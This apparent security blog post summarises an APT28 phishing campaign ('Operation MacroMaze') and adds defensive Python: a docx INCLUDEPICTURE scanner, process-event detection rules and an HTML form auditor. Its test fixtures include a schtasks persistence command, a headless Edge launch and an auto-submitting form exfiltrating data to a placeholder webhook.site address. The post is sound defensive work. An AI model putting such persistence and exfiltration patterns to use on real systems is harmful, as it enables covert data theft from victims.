
Operation MacroMaze: APT28's Webhook Exploits

  • Feb 24

Key Findings


  • Russia-linked APT28 targeted European entities with a webhook-based macro malware campaign called Operation MacroMaze from September 2025 to January 2026.

  • The campaign used spear-phishing emails delivering weaponized documents with an "INCLUDEPICTURE" field pointing to a webhook[.]site URL hosting a JPG.

  • When opened, the file silently retrieves the image, acting as a tracking pixel to alert attackers the document was viewed.

  • Variants dropped modified macros that launched a VBScript triggering multi-stage execution, created a Scheduled Task for persistence, and used browser-based exfiltration to send stolen data to webhook[.]site endpoints.

  • The campaign leveraged simple tools and legitimate services for infrastructure and data exfiltration, making detection and attribution more challenging.


Background


Russia-linked APT28 (aka UAC-0001, Fancy Bear, Pawn Storm, Sofacy Group, Sednit, BlueDelta, and STRONTIUM) has been active since at least 2007, targeting governments, militaries, and security organizations worldwide. The group was also involved in the 2016 U.S. Presidential election attacks.


APT28 operates out of military unit 26165 of the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS). In January 2026, Zscaler ThreatLabz uncovered the campaign Operation Neusploit targeting Central and Eastern Europe, using weaponized RTF files and localized lures to deploy various implants.


Spear-Phishing and Weaponized Documents


The Operation MacroMaze campaign begins with spear-phishing emails delivering weaponized documents. These documents contain an "INCLUDEPICTURE" field pointing to a webhook[.]site URL hosting a JPG file.


  • The INCLUDEPICTURE field is embedded in the document's XML and instructs Microsoft Word to retrieve the external image resource.

  • When the document is opened and the fields are updated, an outbound HTTP request is generated to the remote server, effectively confirming the document has been viewed.
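The two bullets above describe where the INCLUDEPICTURE field lives and why it produces an outbound request. The following scanner, an added example that is not code from this post or from the reports it summarises, checks a .docx for that construct from the defender's side: it unzips the document, walks `word/document.xml`, joins the field code that Word often splits across several `w:instrText` runs, and reports any INCLUDEPICTURE whose target is an http(s) URL. The sample document it builds is constructed test input (the webhook path is a placeholder, not a campaign indicator) and is not meant to open in Word.

```python
"""Scan a .docx for INCLUDEPICTURE fields that point at an external URL.

Added example for this post; not code from the original article or from the
reports it summarises. Standard library only; assumes a normal OOXML .docx
(a zip archive containing word/document.xml).
"""
from __future__ import annotations

import io
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
FLD_CHAR = f"{{{W_NS}}}fldChar"
FLD_TYPE = f"{{{W_NS}}}fldCharType"
INSTR_TEXT = f"{{{W_NS}}}instrText"

# INCLUDEPICTURE "<target>" [switches]; the target may be quoted or bare.
INCLUDEPICTURE_RE = re.compile(r'^\s*INCLUDEPICTURE\s+"?([^"\s]+)"?', re.IGNORECASE)


def extract_field_codes(docx_bytes: bytes) -> list[str]:
    """Return every field code in word/document.xml.

    Word often splits one field code across several w:instrText runs, so all
    instrText between a fldChar begin and the matching fldChar end are joined.
    """
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        root = ET.fromstring(zf.read("word/document.xml"))
    codes: list[str] = []
    buf: list[str] = []
    inside = False
    for el in root.iter():
        if el.tag == FLD_CHAR:
            kind = el.get(FLD_TYPE)
            if kind == "begin":
                inside, buf = True, []
            elif kind == "end" and inside:
                codes.append("".join(buf).strip())
                inside = False
        elif el.tag == INSTR_TEXT and inside:
            buf.append(el.text or "")
    return codes


def find_remote_includepictures(docx_bytes: bytes) -> list[dict]:
    """Flag INCLUDEPICTURE fields whose target is an http(s) URL.

    A local image path is not reported: only a remote target makes Word issue
    the outbound request that acts as the tracking pixel.
    """
    findings = []
    for code in extract_field_codes(docx_bytes):
        m = INCLUDEPICTURE_RE.match(code)
        if not m:
            continue
        target = m.group(1)
        parsed = urlparse(target)
        if parsed.scheme.lower() not in ("http", "https"):
            continue
        host = (parsed.hostname or "").lower()
        findings.append({
            "url": target,
            "host": host,
            # webhook.site is the service the post names; extend for your environment.
            "known_webhook_host": host == "webhook.site" or host.endswith(".webhook.site"),
        })
    return findings


def build_sample_docx(target: str) -> bytes:
    """Build a minimal .docx in memory with one INCLUDEPICTURE field.

    Constructed test input for the scanner, not a lure document; it is not
    meant to open in Word.
    """
    document_xml = f'''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:document xmlns:w="{W_NS}"><w:body><w:p>
<w:r><w:fldChar w:fldCharType="begin"/></w:r>
<w:r><w:instrText xml:space="preserve"> INCLUDEPICTURE </w:instrText></w:r>
<w:r><w:instrText xml:space="preserve">"{target}" \\d</w:instrText></w:r>
<w:r><w:fldChar w:fldCharType="separate"/></w:r>
<w:r><w:fldChar w:fldCharType="end"/></w:r>
</w:p></w:body></w:document>'''
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", document_xml)
    return out.getvalue()


if __name__ == "__main__":
    # Placeholder webhook path (constructed), not an indicator from the campaign.
    sample = build_sample_docx(
        "https://webhook.site/00000000-0000-0000-0000-000000000000/image.jpg")
    for finding in find_remote_includepictures(sample):
        print(finding)
```

To use it on real mail attachments, feed `find_remote_includepictures` the bytes of each .docx; a remote target alone is worth triage, and a known webhook host is worth blocking at the proxy regardless of whether the document also carries a macro.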


Malware Delivery and Execution


Variant malware samples dropped by the weaponized documents exhibit the following behavior:


  • Four closely related macro variants act as droppers, each deploying six files (VBS, BAT, CMD, HTM, XHTML) into the %USERPROFILE% folder using GUID-like names.

  • The macro launches a VBScript that triggers multi-stage execution, creates a Scheduled Task for persistence, and deletes traces.

  • Over time, the variants evolved from simple document cleanup to more sophisticated techniques, including fake Word error messages and SendKeys-based UI manipulation to bypass security prompts.

  • Two batch file variants use Microsoft Edge in headless mode or hide the browser off-screen to exfiltrate data.
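The dropper, persistence and browser behaviour in the list above maps onto a few process-creation rules. The block below is an added example, not detection content from this post or the reports it summarises: it runs constructed Sysmon-style events (invented user name, GUIDs and timestamps) through rules that encode only what the post states, namely an Office process spawning a script host, a GUID-named VBS/BAT/CMD/HTM/XHTML file directly under the user profile, a scheduled task pointing at such a file, and Microsoft Edge rendering such a file, optionally with `--headless`.

```python
"""Detection rules for the dropper and persistence behaviour described above.

Added example for this post; not code or detection content from the original
article or the reports it summarises. EVENTS are constructed, Sysmon-style
process-creation records, not real telemetry.
"""
from __future__ import annotations

import re

GUID = r"\{?[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\}?"
PROFILE_ROOT = r"c:[\\/]users[\\/][^\\/\s\"']+[\\/]"
# A GUID-named VBS/BAT/CMD/HTM/XHTML file sitting directly in %USERPROFILE%.
GUID_FILE_IN_PROFILE = re.compile(
    PROFILE_ROOT + GUID + r"\.(?:vbs|bat|cmd|htm|html|xhtml)\b", re.IGNORECASE)
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def _basename(path: str) -> str:
    return re.split(r"[\\/]", path)[-1].lower()


def evaluate(event: dict) -> list[str]:
    """Return the names of the rules an event matches (empty if none)."""
    image = _basename(event["image"])
    parent = _basename(event.get("parent", ""))
    cmd = event["cmdline"]
    hits: list[str] = []
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        hits.append("office_spawned_script_host")
    if image in SCRIPT_HOSTS and GUID_FILE_IN_PROFILE.search(cmd):
        hits.append("script_host_runs_guid_file_in_profile")
    if image == "schtasks.exe" and re.search(r"/create\b", cmd, re.I) \
            and GUID_FILE_IN_PROFILE.search(cmd):
        hits.append("schtasks_persists_guid_file_in_profile")
    if image == "msedge.exe" and GUID_FILE_IN_PROFILE.search(cmd):
        hits.append("edge_headless_renders_local_guid_html"
                    if "--headless" in cmd.lower()
                    else "edge_renders_local_guid_html")
    return hits


def detect(events: list[dict]) -> list[tuple[str, str]]:
    """Run every rule over every event; return (timestamp, rule) pairs."""
    return [(ev["ts"], rule) for ev in events for rule in evaluate(ev)]


# Constructed sample events. User name, GUIDs and timestamps are invented.
EVENTS = [
    {"ts": "2026-01-12T09:01:03Z",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\3f2c1b7a-9d4e-4a8b-b2c1-7e6f5a4d3c2b.vbs"'},
    {"ts": "2026-01-12T09:01:05Z",
     "parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /tn "Updater" /sc minute /mo 5 '
                r'/tr "wscript.exe C:\Users\alice\3f2c1b7a-9d4e-4a8b-b2c1-7e6f5a4d3c2b.vbs"'},
    {"ts": "2026-01-12T09:01:09Z",
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "cmdline": r"msedge.exe --headless file:///C:/Users/alice/5a4d3c2b-1e2f-4a3b-8c9d-0e1f2a3b4c5d.htm"},
    {"ts": "2026-01-12T09:30:00Z",  # benign: ordinary browsing
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "cmdline": r"msedge.exe https://example.com/"},
    {"ts": "2026-01-12T09:31:00Z",  # benign: vendor script outside the profile root
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Program Files\Vendor Tool\setup.vbs"'},
]

if __name__ == "__main__":
    for ts, rule in detect(EVENTS):
        print(ts, rule)
```

The rules deliberately key on the combination (script host plus GUID-named file plus profile root) rather than on any one feature, since `wscript.exe`, `schtasks.exe /create` and headless Edge are each common in legitimate administration; the Office-parent rule is the one that fires earliest in the chain.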


Browser-Based Exfiltration


The final stage of the attack chain uses a browser-based exfiltration method to send stolen data to webhook[.]site endpoints:


  • The HTML file is constructed by concatenating a static HTM file, the captured output of the reconstructed CMD payload, and a closing XHTML template.

  • The initial HTM file defines an auto-submitting form that sends a POST request to a webhook[.]site endpoint, with the payload output embedded within the form.

  • When the HTML file is rendered by Microsoft Edge, the form is automatically submitted, exfiltrating the collected data without user interaction.
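The exfiltration page described above is a self-submitting form whose action is a remote endpoint. The following static check is an added example, not code from this post or the reports it summarises: it parses an HTML file with the standard library, records every form's action and field count, and reports forms that post to an absolute URL together with whether the page submits without user interaction. The post does not say how the auto-submit is triggered, so treating a `body onload` handler or an inline script that calls `submit()` as the trigger is an assumption of this example; the sample pages are constructed and the webhook path is a placeholder.

```python
"""Static check for an HTML file that auto-submits a form to a remote endpoint.

Added example for this post; not code from the original article or the reports
it summarises. Standard library only. Assumes the auto-submit comes from a body
onload handler or an inline script calling a form's submit() method (the post
does not state the mechanism).
"""
from __future__ import annotations

import re
from html.parser import HTMLParser
from urllib.parse import urlparse

SUBMIT_CALL = re.compile(r"\.submit\s*\(", re.IGNORECASE)


class FormAuditor(HTMLParser):
    """Collect forms, their field counts, inline scripts and the body onload handler."""

    def __init__(self) -> None:
        super().__init__()
        self.forms: list[dict] = []
        self.scripts: list[str] = []
        self.body_onload = ""
        self._form: dict | None = None
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form = {"action": a.get("action") or "",
                          "method": (a.get("method") or "get").lower(),
                          "fields": 0}
            self.forms.append(self._form)
        elif tag in ("input", "textarea", "select") and self._form is not None:
            self._form["fields"] += 1
        elif tag == "script":
            self._in_script = True
        elif tag == "body":
            self.body_onload = a.get("onload") or ""

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def audit_html(html: str) -> list[dict]:
    """Report forms whose action is an absolute URL (data leaves the local file).

    Each finding records the target host, method, field count, whether the page
    submits a form without user interaction, and whether the host is the
    webhook.site service named in the post.
    """
    p = FormAuditor()
    p.feed(html)
    auto_submit = bool(SUBMIT_CALL.search(p.body_onload)
                       or any(SUBMIT_CALL.search(s) for s in p.scripts))
    findings = []
    for form in p.forms:
        host = (urlparse(form["action"]).hostname or "").lower()
        if not host:
            continue  # relative action stays on the same origin
        findings.append({
            "action_host": host,
            "method": form["method"],
            "fields": form["fields"],
            "auto_submit": auto_submit,
            "known_webhook_host": host == "webhook.site" or host.endswith(".webhook.site"),
        })
    return findings


# Constructed samples; the webhook path is a placeholder, not a campaign indicator.
SAMPLE_EXFIL_HTML = """<html><body onload="document.forms[0].submit()">
<form method="post" action="https://webhook.site/00000000-0000-0000-0000-000000000000">
<textarea name="out">[constructed placeholder for collected command output]</textarea>
</form></body></html>"""

SAMPLE_BENIGN_HTML = """<html><body><form method="post" action="/login">
<input name="user"><input type="password" name="pw"><button>Sign in</button>
</form></body></html>"""

if __name__ == "__main__":
    print(audit_html(SAMPLE_EXFIL_HTML))   # one finding, auto_submit True
    print(audit_html(SAMPLE_BENIGN_HTML))  # []
```

Run it over .htm/.html files found directly under user profiles (the drop location the post describes); a POST to an external host combined with auto-submit is the signature of this stage, and the same check is cheap enough to apply to HTML attachments in mail.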


Conclusion


The Operation MacroMaze campaign demonstrates that APT28 can leverage simple tools and legitimate services for effective data exfiltration. The use of webhook-based infrastructure, browser-based techniques, and evolving malware variants made this operation challenging to detect and attribute.


Sources


  • https://securityaffairs.com/188421/apt/operation-macromaze-apt28-exploits-webhooks-for-covert-data-exfiltration.html

  • https://unsafe.sh/go-397175.html

© 2025 by Explain IT Again. Powered and secured by Wix
